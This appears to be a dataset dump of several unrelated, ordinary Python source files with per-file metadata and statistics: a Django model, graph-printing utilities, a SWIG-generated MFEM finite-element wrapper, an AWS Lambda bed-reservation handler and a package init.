| 33.636364 | 79 | 0.764865 | 51 | 370 | 5.529412 | 0.843137 | 0.056738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003077 | 0.121622 | 370 | 10 | 80 | 37 | 0.864615 | 0.6 | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.333333 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
13bd8a022bd7067f818f2edfa3c4f6afeb89ef69 | 325 | py | Python | example/coffee/models.py | nyradr/django-unicorn | 48a112ee1187715c4dbb54b24cb7b4688a24ac4b | [
"MIT"
] | 1 | 2021-02-11T13:26:06.000Z | 2021-02-11T13:26:06.000Z | example/coffee/models.py | nyradr/django-unicorn | 48a112ee1187715c4dbb54b24cb7b4688a24ac4b | [
"MIT"
] | null | null | null | example/coffee/models.py | nyradr/django-unicorn | 48a112ee1187715c4dbb54b24cb7b4688a24ac4b | [
"MIT"
] | null | null | null | from django.db.models import SET_NULL, ForeignKey, Model
from django.db.models.fields import CharField
class Flavor(Model):
name = CharField(max_length=255)
label = CharField(max_length=255)
parent = ForeignKey("self", blank=True, null=True, on_delete=SET_NULL)
def __str__(self):
return self.name
| 27.083333 | 74 | 0.729231 | 46 | 325 | 4.956522 | 0.586957 | 0.087719 | 0.105263 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.169231 | 325 | 11 | 75 | 29.545455 | 0.822222 | 0 | 0 | 0 | 0 | 0 | 0.012308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0.125 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
13ceb9b96c3aa64340e4d65b361bc0b0d1c7930f | 764 | py | Python | src/utils/printer.py | badouralix/IS3014AD | 3c7ac2de82e2c4c30e1908cb0771650878424df4 | [
"MIT"
] | null | null | null | src/utils/printer.py | badouralix/IS3014AD | 3c7ac2de82e2c4c30e1908cb0771650878424df4 | [
"MIT"
] | null | null | null | src/utils/printer.py | badouralix/IS3014AD | 3c7ac2de82e2c4c30e1908cb0771650878424df4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from anytree import RenderTree
from networkx import nx
import os
import pygraphviz  # noqa: F401 -- required at runtime by the nx_agraph backend below
import time
def timeit(method):
def timed(*args, **kw):
print(f"Running {method.__name__}...")
ts = time.time()
result = method(*args, **kw)
te = time.time()
print(f"{method.__name__} took {(te - ts) * 1000:.2f}ms\n")
return result
return timed
def print_ast(ast):
print(RenderTree(ast))
def print_cfg(cfg):
print(nx.drawing.nx_pydot.to_pydot(cfg))
def write_cfg(cfg, filename, layout="dot"):
path = "output/" + os.path.splitext(filename)[0] + f".{layout}.png"
graph = nx.drawing.nx_agraph.to_agraph(cfg)
graph.layout(layout)
graph.draw(path)
| 20.648649 | 71 | 0.63089 | 108 | 764 | 4.324074 | 0.481481 | 0.025696 | 0.047109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013289 | 0.212042 | 764 | 36 | 72 | 21.222222 | 0.762458 | 0.056283 | 0 | 0 | 0 | 0 | 0.139082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.217391 | 0 | 0.521739 | 0.26087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
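The `timeit` decorator above can be applied to any function; the decorator is copied here so the snippet runs standalone, and `busy_sum` is just an illustrative workload:

```python
import time

def timeit(method):
    """Print how long `method` takes each time it is called."""
    def timed(*args, **kw):
        print(f"Running {method.__name__}...")
        ts = time.time()
        result = method(*args, **kw)
        te = time.time()
        print(f"{method.__name__} took {(te - ts) * 1000:.2f}ms\n")
        return result
    return timed

@timeit
def busy_sum(n):
    return sum(range(n))

# The wrapper passes the return value through unchanged.
assert busy_sum(1000) == 499500
```

Because `timed` forwards `*args, **kw` and returns `result`, decorated functions keep their original call signature and return value; only the timing output is added.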
13cf07bf14db42514ba47a2ecdb3238828dcb0cb | 23,279 | py | Python | mfem/_par/pfespace.py | tomstitt/PyMFEM | b00199ec0d7a5fba891f656575e91a64d3e35eb5 | [
"BSD-3-Clause"
] | null | null | null | mfem/_par/pfespace.py | tomstitt/PyMFEM | b00199ec0d7a5fba891f656575e91a64d3e35eb5 | [
"BSD-3-Clause"
] | null | null | null | mfem/_par/pfespace.py | tomstitt/PyMFEM | b00199ec0d7a5fba891f656575e91a64d3e35eb5 | [
"BSD-3-Clause"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 4.0.2
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError("Python 2.7 or later required")
# Import the low-level C/C++ module
if __package__ or "." in __name__:
from . import _pfespace
else:
import _pfespace
try:
import builtins as __builtin__
except ImportError:
import __builtin__
_swig_new_instance_method = _pfespace.SWIG_PyInstanceMethod_New
_swig_new_static_method = _pfespace.SWIG_PyStaticMethod_New
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
def _swig_setattr_nondynamic_instance_variable(set):
def set_instance_attr(self, name, value):
if name == "thisown":
self.this.own(value)
elif name == "this":
set(self, name, value)
elif hasattr(self, name) and isinstance(getattr(type(self), name), property):
set(self, name, value)
else:
raise AttributeError("You cannot add instance attributes to %s" % self)
return set_instance_attr
def _swig_setattr_nondynamic_class_variable(set):
def set_class_attr(cls, name, value):
if hasattr(cls, name) and not isinstance(getattr(cls, name), property):
set(cls, name, value)
else:
raise AttributeError("You cannot add class attributes to %s" % cls)
return set_class_attr
def _swig_add_metaclass(metaclass):
"""Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass"""
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class _SwigNonDynamicMeta(type):
"""Meta class to enforce nondynamic attributes (no new attributes) for a class"""
__setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__)
import weakref
MFEM_VERSION = _pfespace.MFEM_VERSION
MFEM_VERSION_STRING = _pfespace.MFEM_VERSION_STRING
MFEM_VERSION_TYPE = _pfespace.MFEM_VERSION_TYPE
MFEM_VERSION_TYPE_RELEASE = _pfespace.MFEM_VERSION_TYPE_RELEASE
MFEM_VERSION_TYPE_DEVELOPMENT = _pfespace.MFEM_VERSION_TYPE_DEVELOPMENT
MFEM_VERSION_MAJOR = _pfespace.MFEM_VERSION_MAJOR
MFEM_VERSION_MINOR = _pfespace.MFEM_VERSION_MINOR
MFEM_VERSION_PATCH = _pfespace.MFEM_VERSION_PATCH
MFEM_HYPRE_VERSION = _pfespace.MFEM_HYPRE_VERSION
import mfem._par.operators
import mfem._par.mem_manager
import mfem._par.vector
import mfem._par.array
import mfem._par.fespace
import mfem._par.coefficient
import mfem._par.globals
import mfem._par.matrix
import mfem._par.intrules
import mfem._par.sparsemat
import mfem._par.densemat
import mfem._par.eltrans
import mfem._par.fe
import mfem._par.geom
import mfem._par.mesh
import mfem._par.sort_pairs
import mfem._par.ncmesh
import mfem._par.vtk
import mfem._par.element
import mfem._par.table
import mfem._par.hash
import mfem._par.vertex
import mfem._par.gridfunc
import mfem._par.bilininteg
import mfem._par.fe_coll
import mfem._par.lininteg
import mfem._par.linearform
import mfem._par.handle
import mfem._par.hypre
import mfem._par.restriction
import mfem._par.pmesh
import mfem._par.pncmesh
import mfem._par.communication
import mfem._par.sets
class ParFiniteElementSpace(mfem._par.fespace.FiniteElementSpace):
r"""Proxy of C++ mfem::ParFiniteElementSpace class."""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
num_face_nbr_dofs = property(_pfespace.ParFiniteElementSpace_num_face_nbr_dofs_get, _pfespace.ParFiniteElementSpace_num_face_nbr_dofs_set, doc=r"""num_face_nbr_dofs : int""")
face_nbr_element_dof = property(_pfespace.ParFiniteElementSpace_face_nbr_element_dof_get, _pfespace.ParFiniteElementSpace_face_nbr_element_dof_set, doc=r"""face_nbr_element_dof : mfem::Table""")
face_nbr_ldof = property(_pfespace.ParFiniteElementSpace_face_nbr_ldof_get, _pfespace.ParFiniteElementSpace_face_nbr_ldof_set, doc=r"""face_nbr_ldof : mfem::Table""")
face_nbr_glob_dof_map = property(_pfespace.ParFiniteElementSpace_face_nbr_glob_dof_map_get, doc=r"""face_nbr_glob_dof_map : mfem::Array<(HYPRE_Int)>""")
send_face_nbr_ldof = property(_pfespace.ParFiniteElementSpace_send_face_nbr_ldof_get, _pfespace.ParFiniteElementSpace_send_face_nbr_ldof_set, doc=r"""send_face_nbr_ldof : mfem::Table""")
def __init__(self, *args):
r"""
__init__(ParFiniteElementSpace self, ParFiniteElementSpace orig, ParMesh pmesh=None, FiniteElementCollection fec=None) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, FiniteElementSpace orig, ParMesh pmesh, FiniteElementCollection fec=None) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, ParMesh pm, FiniteElementSpace global_fes, int const * partitioning, FiniteElementCollection f=None) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, ParMesh pm, FiniteElementCollection f, int dim=1, int ordering=byNODES) -> ParFiniteElementSpace
__init__(ParFiniteElementSpace self, ParMesh pm, mfem::NURBSExtension * ext, FiniteElementCollection f, int dim=1, int ordering=byNODES) -> ParFiniteElementSpace
"""
_pfespace.ParFiniteElementSpace_swiginit(self, _pfespace.new_ParFiniteElementSpace(*args))
def GetComm(self):
r"""GetComm(ParFiniteElementSpace self) -> MPI_Comm"""
return _pfespace.ParFiniteElementSpace_GetComm(self)
GetComm = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetComm)
def GetNRanks(self):
r"""GetNRanks(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetNRanks(self)
GetNRanks = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetNRanks)
def GetMyRank(self):
r"""GetMyRank(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetMyRank(self)
GetMyRank = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetMyRank)
def GetParMesh(self):
r"""GetParMesh(ParFiniteElementSpace self) -> ParMesh"""
return _pfespace.ParFiniteElementSpace_GetParMesh(self)
GetParMesh = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetParMesh)
def GetDofSign(self, i):
r"""GetDofSign(ParFiniteElementSpace self, int i) -> int"""
return _pfespace.ParFiniteElementSpace_GetDofSign(self, i)
GetDofSign = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetDofSign)
def GetDofOffsets(self):
r"""GetDofOffsets(ParFiniteElementSpace self) -> HYPRE_Int *"""
return _pfespace.ParFiniteElementSpace_GetDofOffsets(self)
GetDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetDofOffsets)
def GetTrueDofOffsets(self):
r"""GetTrueDofOffsets(ParFiniteElementSpace self) -> HYPRE_Int *"""
return _pfespace.ParFiniteElementSpace_GetTrueDofOffsets(self)
GetTrueDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetTrueDofOffsets)
def GlobalVSize(self):
r"""GlobalVSize(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GlobalVSize(self)
GlobalVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GlobalVSize)
def GlobalTrueVSize(self):
r"""GlobalTrueVSize(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GlobalTrueVSize(self)
GlobalTrueVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GlobalTrueVSize)
def GetTrueVSize(self):
r"""GetTrueVSize(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetTrueVSize(self)
GetTrueVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetTrueVSize)
def GetElementDofs(self, i):
from .array import intArray
vdofs = intArray()
_pfespace.ParFiniteElementSpace_GetElementDofs(self, i, vdofs)
return vdofs.ToList()
def GetBdrElementDofs(self, i):
from .array import intArray
vdofs = intArray()
_pfespace.ParFiniteElementSpace_GetBdrElementDofs(self, i, vdofs)
return vdofs.ToList()
def GetFaceDofs(self, i):
from .array import intArray
vdofs = intArray()
_pfespace.ParFiniteElementSpace_GetFaceDofs(self, i, vdofs)
return vdofs.ToList()
def GetFaceRestriction(self, *args, **kwargs):
r"""GetFaceRestriction(ParFiniteElementSpace self, mfem::ElementDofOrdering e_ordering, mfem::FaceType type, mfem::L2FaceValues mul=DoubleValued) -> Operator"""
return _pfespace.ParFiniteElementSpace_GetFaceRestriction(self, *args, **kwargs)
GetFaceRestriction = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceRestriction)
def GetSharedEdgeDofs(self, group, ei):
from .array import intArray
dofs = intArray()
_pfespace.ParFiniteElementSpace_GetSharedEdgeDofs(self, group, ei, dofs)
return dofs.ToList()
def GetSharedTriangleDofs(self, group, fi, dofs):
r"""GetSharedTriangleDofs(ParFiniteElementSpace self, int group, int fi, intArray dofs)"""
return _pfespace.ParFiniteElementSpace_GetSharedTriangleDofs(self, group, fi, dofs)
GetSharedTriangleDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetSharedTriangleDofs)
def GetSharedQuadrilateralDofs(self, group, fi, dofs):
r"""GetSharedQuadrilateralDofs(ParFiniteElementSpace self, int group, int fi, intArray dofs)"""
return _pfespace.ParFiniteElementSpace_GetSharedQuadrilateralDofs(self, group, fi, dofs)
GetSharedQuadrilateralDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetSharedQuadrilateralDofs)
def Dof_TrueDof_Matrix(self):
r"""Dof_TrueDof_Matrix(ParFiniteElementSpace self) -> HypreParMatrix"""
return _pfespace.ParFiniteElementSpace_Dof_TrueDof_Matrix(self)
Dof_TrueDof_Matrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Dof_TrueDof_Matrix)
def GetPartialConformingInterpolation(self):
r"""GetPartialConformingInterpolation(ParFiniteElementSpace self) -> HypreParMatrix"""
return _pfespace.ParFiniteElementSpace_GetPartialConformingInterpolation(self)
GetPartialConformingInterpolation = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetPartialConformingInterpolation)
def NewTrueDofVector(self):
r"""NewTrueDofVector(ParFiniteElementSpace self) -> HypreParVector"""
return _pfespace.ParFiniteElementSpace_NewTrueDofVector(self)
NewTrueDofVector = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_NewTrueDofVector)
def DivideByGroupSize(self, vec):
r"""DivideByGroupSize(ParFiniteElementSpace self, double * vec)"""
return _pfespace.ParFiniteElementSpace_DivideByGroupSize(self, vec)
DivideByGroupSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_DivideByGroupSize)
def GroupComm(self, *args):
r"""
GroupComm(ParFiniteElementSpace self) -> GroupCommunicator
GroupComm(ParFiniteElementSpace self) -> GroupCommunicator
"""
return _pfespace.ParFiniteElementSpace_GroupComm(self, *args)
GroupComm = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GroupComm)
def ScalarGroupComm(self):
r"""ScalarGroupComm(ParFiniteElementSpace self) -> GroupCommunicator"""
return _pfespace.ParFiniteElementSpace_ScalarGroupComm(self)
ScalarGroupComm = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_ScalarGroupComm)
def Synchronize(self, ldof_marker):
r"""Synchronize(ParFiniteElementSpace self, intArray ldof_marker)"""
return _pfespace.ParFiniteElementSpace_Synchronize(self, ldof_marker)
Synchronize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Synchronize)
def GetEssentialVDofs(self, bdr_attr_is_ess, ess_dofs, component=-1):
r"""GetEssentialVDofs(ParFiniteElementSpace self, intArray bdr_attr_is_ess, intArray ess_dofs, int component=-1)"""
return _pfespace.ParFiniteElementSpace_GetEssentialVDofs(self, bdr_attr_is_ess, ess_dofs, component)
GetEssentialVDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetEssentialVDofs)
def GetEssentialTrueDofs(self, bdr_attr_is_ess, ess_tdof_list, component=-1):
r"""GetEssentialTrueDofs(ParFiniteElementSpace self, intArray bdr_attr_is_ess, intArray ess_tdof_list, int component=-1)"""
return _pfespace.ParFiniteElementSpace_GetEssentialTrueDofs(self, bdr_attr_is_ess, ess_tdof_list, component)
GetEssentialTrueDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetEssentialTrueDofs)
def GetLocalTDofNumber(self, ldof):
r"""GetLocalTDofNumber(ParFiniteElementSpace self, int ldof) -> int"""
return _pfespace.ParFiniteElementSpace_GetLocalTDofNumber(self, ldof)
GetLocalTDofNumber = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetLocalTDofNumber)
def GetGlobalTDofNumber(self, ldof):
r"""GetGlobalTDofNumber(ParFiniteElementSpace self, int ldof) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetGlobalTDofNumber(self, ldof)
GetGlobalTDofNumber = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetGlobalTDofNumber)
def GetGlobalScalarTDofNumber(self, sldof):
r"""GetGlobalScalarTDofNumber(ParFiniteElementSpace self, int sldof) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetGlobalScalarTDofNumber(self, sldof)
GetGlobalScalarTDofNumber = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetGlobalScalarTDofNumber)
def GetMyDofOffset(self):
r"""GetMyDofOffset(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetMyDofOffset(self)
GetMyDofOffset = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetMyDofOffset)
def GetMyTDofOffset(self):
r"""GetMyTDofOffset(ParFiniteElementSpace self) -> HYPRE_Int"""
return _pfespace.ParFiniteElementSpace_GetMyTDofOffset(self)
GetMyTDofOffset = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetMyTDofOffset)
def GetProlongationMatrix(self):
r"""GetProlongationMatrix(ParFiniteElementSpace self) -> Operator"""
return _pfespace.ParFiniteElementSpace_GetProlongationMatrix(self)
GetProlongationMatrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetProlongationMatrix)
def GetRestrictionMatrix(self):
r"""GetRestrictionMatrix(ParFiniteElementSpace self) -> SparseMatrix"""
return _pfespace.ParFiniteElementSpace_GetRestrictionMatrix(self)
GetRestrictionMatrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetRestrictionMatrix)
def ExchangeFaceNbrData(self):
r"""ExchangeFaceNbrData(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_ExchangeFaceNbrData(self)
ExchangeFaceNbrData = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_ExchangeFaceNbrData)
def GetFaceNbrVSize(self):
r"""GetFaceNbrVSize(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrVSize(self)
GetFaceNbrVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrVSize)
def GetFaceNbrElementVDofs(self, i, vdofs):
r"""GetFaceNbrElementVDofs(ParFiniteElementSpace self, int i, intArray vdofs)"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrElementVDofs(self, i, vdofs)
GetFaceNbrElementVDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrElementVDofs)
def GetFaceNbrFaceVDofs(self, i, vdofs):
r"""GetFaceNbrFaceVDofs(ParFiniteElementSpace self, int i, intArray vdofs)"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrFaceVDofs(self, i, vdofs)
GetFaceNbrFaceVDofs = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrFaceVDofs)
def GetFaceNbrFE(self, i):
r"""GetFaceNbrFE(ParFiniteElementSpace self, int i) -> FiniteElement"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrFE(self, i)
GetFaceNbrFE = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrFE)
def GetFaceNbrFaceFE(self, i):
r"""GetFaceNbrFaceFE(ParFiniteElementSpace self, int i) -> FiniteElement"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrFaceFE(self, i)
GetFaceNbrFaceFE = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrFaceFE)
def GetFaceNbrGlobalDofMap(self):
r"""GetFaceNbrGlobalDofMap(ParFiniteElementSpace self) -> HYPRE_Int const *"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrGlobalDofMap(self)
GetFaceNbrGlobalDofMap = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrGlobalDofMap)
def GetFaceNbrElementTransformation(self, i):
r"""GetFaceNbrElementTransformation(ParFiniteElementSpace self, int i) -> ElementTransformation"""
return _pfespace.ParFiniteElementSpace_GetFaceNbrElementTransformation(self, i)
GetFaceNbrElementTransformation = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetFaceNbrElementTransformation)
def Lose_Dof_TrueDof_Matrix(self):
r"""Lose_Dof_TrueDof_Matrix(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_Lose_Dof_TrueDof_Matrix(self)
Lose_Dof_TrueDof_Matrix = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Lose_Dof_TrueDof_Matrix)
def LoseDofOffsets(self):
r"""LoseDofOffsets(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_LoseDofOffsets(self)
LoseDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_LoseDofOffsets)
def LoseTrueDofOffsets(self):
r"""LoseTrueDofOffsets(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_LoseTrueDofOffsets(self)
LoseTrueDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_LoseTrueDofOffsets)
def Conforming(self):
r"""Conforming(ParFiniteElementSpace self) -> bool"""
return _pfespace.ParFiniteElementSpace_Conforming(self)
Conforming = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Conforming)
def Nonconforming(self):
r"""Nonconforming(ParFiniteElementSpace self) -> bool"""
return _pfespace.ParFiniteElementSpace_Nonconforming(self)
Nonconforming = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Nonconforming)
def GetTrueTransferOperator(self, coarse_fes, T):
r"""GetTrueTransferOperator(ParFiniteElementSpace self, FiniteElementSpace coarse_fes, OperatorHandle T)"""
return _pfespace.ParFiniteElementSpace_GetTrueTransferOperator(self, coarse_fes, T)
GetTrueTransferOperator = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetTrueTransferOperator)
def Update(self, want_transform=True):
r"""Update(ParFiniteElementSpace self, bool want_transform=True)"""
return _pfespace.ParFiniteElementSpace_Update(self, want_transform)
Update = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Update)
def UpdatesFinished(self):
r"""UpdatesFinished(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_UpdatesFinished(self)
UpdatesFinished = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_UpdatesFinished)
__swig_destroy__ = _pfespace.delete_ParFiniteElementSpace
def PrintPartitionStats(self):
r"""PrintPartitionStats(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_PrintPartitionStats(self)
PrintPartitionStats = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_PrintPartitionStats)
def TrueVSize(self):
r"""TrueVSize(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_TrueVSize(self)
TrueVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_TrueVSize)
# Register ParFiniteElementSpace in _pfespace:
_pfespace.ParFiniteElementSpace_swigregister(ParFiniteElementSpace)
class ConformingProlongationOperator(mfem._par.operators.Operator):
r"""Proxy of C++ mfem::ConformingProlongationOperator class."""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
def __init__(self, pfes):
r"""__init__(ConformingProlongationOperator self, ParFiniteElementSpace pfes) -> ConformingProlongationOperator"""
_pfespace.ConformingProlongationOperator_swiginit(self, _pfespace.new_ConformingProlongationOperator(pfes))
def Mult(self, x, y):
r"""Mult(ConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.ConformingProlongationOperator_Mult(self, x, y)
Mult = _swig_new_instance_method(_pfespace.ConformingProlongationOperator_Mult)
def MultTranspose(self, x, y):
r"""MultTranspose(ConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.ConformingProlongationOperator_MultTranspose(self, x, y)
MultTranspose = _swig_new_instance_method(_pfespace.ConformingProlongationOperator_MultTranspose)
__swig_destroy__ = _pfespace.delete_ConformingProlongationOperator
# Register ConformingProlongationOperator in _pfespace:
_pfespace.ConformingProlongationOperator_swigregister(ConformingProlongationOperator)
class DeviceConformingProlongationOperator(ConformingProlongationOperator):
r"""Proxy of C++ mfem::DeviceConformingProlongationOperator class."""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
def __init__(self, pfes):
r"""__init__(DeviceConformingProlongationOperator self, ParFiniteElementSpace pfes) -> DeviceConformingProlongationOperator"""
_pfespace.DeviceConformingProlongationOperator_swiginit(self, _pfespace.new_DeviceConformingProlongationOperator(pfes))
__swig_destroy__ = _pfespace.delete_DeviceConformingProlongationOperator
def Mult(self, x, y):
r"""Mult(DeviceConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.DeviceConformingProlongationOperator_Mult(self, x, y)
Mult = _swig_new_instance_method(_pfespace.DeviceConformingProlongationOperator_Mult)
def MultTranspose(self, x, y):
r"""MultTranspose(DeviceConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.DeviceConformingProlongationOperator_MultTranspose(self, x, y)
MultTranspose = _swig_new_instance_method(_pfespace.DeviceConformingProlongationOperator_MultTranspose)
# Register DeviceConformingProlongationOperator in _pfespace:
_pfespace.DeviceConformingProlongationOperator_swigregister(DeviceConformingProlongationOperator)
# === File: src/backend/catalog/src/reserve-flight/reserve.py (repo: BenjaminKayEight/aws-serverless-airline-booking, license: MIT-0) ===
import json
import os
import boto3
from botocore.exceptions import ClientError
session = boto3.Session()
dynamodb = session.resource('dynamodb')
table = dynamodb.Table(os.environ['STAY_TABLE_NAME'])
class StayReservationException(Exception):
pass
class StayFullyBookedException(StayReservationException):
pass
class StayDoesNotExistException(StayReservationException):
pass
def reserve_bed_on_stay(stay_id):
try:
table.update_item(
Key={"id": stay_id},
            ConditionExpression="id = :idVal AND bedCapacity > :zero",
UpdateExpression="SET bedCapacity = bedCapacity - :dec",
ExpressionAttributeValues={
":idVal": stay_id,
":dec": 1,
":zero": 0
},
)
return {
'status': 'SUCCESS'
}
except dynamodb.meta.client.exceptions.ConditionalCheckFailedException as e:
        # Due to no specificity from the DDB error, this could also mean the stay
        # doesn't exist, but we should've caught that earlier in the flow.
        # TODO: Fix that. Could either use TransactGetItems, or Get then Update.
raise StayFullyBookedException(f"Stay with ID: {stay_id} is fully booked.")
except ClientError as e:
raise StayReservationException(e.response['Error']['Message'])
def lambda_handler(event, context):
if 'stayBookedId' not in event:
raise ValueError('Invalid arguments')
try:
ret = reserve_bed_on_stay(event['stayBookedId'])
except StayReservationException as e:
raise StayReservationException(e)
return json.dumps(ret)
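# The conditional update in reserve_bed_on_stay above makes the capacity check
# and the decrement a single atomic DynamoDB operation. A minimal in-memory
# sketch of the same guard logic (hypothetical names; DynamoDB enforces the
# condition server-side, so this only illustrates the check):

```python
class StayFullyBooked(Exception):
    pass

# Toy table: one stay with two free beds.
stays = {"stay-1": {"bedCapacity": 2}}

def reserve_bed(stay_id):
    stay = stays.get(stay_id)
    # Mirrors ConditionExpression "id = :idVal AND bedCapacity > :zero":
    # decrement only when the item exists and still has capacity.
    if stay is None or stay["bedCapacity"] <= 0:
        raise StayFullyBooked(f"Stay with ID: {stay_id} is fully booked.")
    stay["bedCapacity"] -= 1
    return {"status": "SUCCESS"}

print(reserve_bed("stay-1"))  # {'status': 'SUCCESS'}
print(reserve_bed("stay-1"))  # {'status': 'SUCCESS'}
```

# A third call would raise StayFullyBooked, just as the real handler raises
# StayFullyBookedException when the conditional check fails.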
# === File: courseraoauth2client/commands/__init__.py (repo: sstaudaher/courseraoauth2client, license: Apache-2.0) ===
"Commands and their implementations for Coursera's OAuth2 client."
__all__ = [
"config",
"version"
]
from . import * # noqa
